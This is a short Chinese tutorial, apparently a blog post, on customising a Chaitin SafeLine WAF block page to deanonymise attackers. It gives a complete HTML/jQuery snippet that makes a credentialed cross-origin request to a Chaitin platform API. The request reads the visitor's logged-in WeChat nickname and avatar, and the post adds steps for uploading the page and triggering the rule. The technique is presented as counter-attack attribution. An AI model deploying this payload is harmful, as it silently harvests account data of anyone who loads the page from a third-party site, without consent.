1、应用场景

     当攻击行为触发WAF(Web应用防火墙)规则时,我们有能力通过前端JavaScript代码实施远程跨域操作,进而获取攻击者的账号信息。这一举措不仅增强了我们对潜在威胁的感知能力,也为后续对攻击者进行溯源提供了宝贵的线索和关键信息。通过收集和分析这些账号数据,我们能够更精准地追踪攻击者的身份和行动轨迹,从而有效应对网络安全威胁,保护用户数据安全。同时,这也提醒我们,在网络安全领域,持续的技术创新和严密的防护措施是不可或缺的,我们必须时刻保持警惕,确保网络空间的安全和稳定。

2、长亭雷池官网现在demo有专业版本的演示,这个专业版本是可以自定义WAF的一些页面的。

3.长亭百川平台下面的接口是可以获取到登录的用户信息的,其中包括微信昵称和微信头像。

https://rivers.chaitin.cn/api/v1/user/profile

4.本地创建一个html文件,代码如下。


<script src="https://cdn.bootcdn.net/ajax/libs/jquery/3.7.1/jquery.min.js"></script>
<script>
$.get({
  url: "https://rivers.chaitin.cn/api/v1/user/profile",
  xhrFields: {
    withCredentials: true
  },
  success: function(data) {
    console.log("wechat_nickname:" + data.data.wechat_nickname + "\r\n头像地址:" + data.data.head_img_url);
  }
});
</script>

5.然后上传这个html页面。

6.最后访问下面地址触发WAF规则,即可获取用户的微信昵称和微信头像了。

https://demo.waf-ce.chaitin.cn/?id=whoami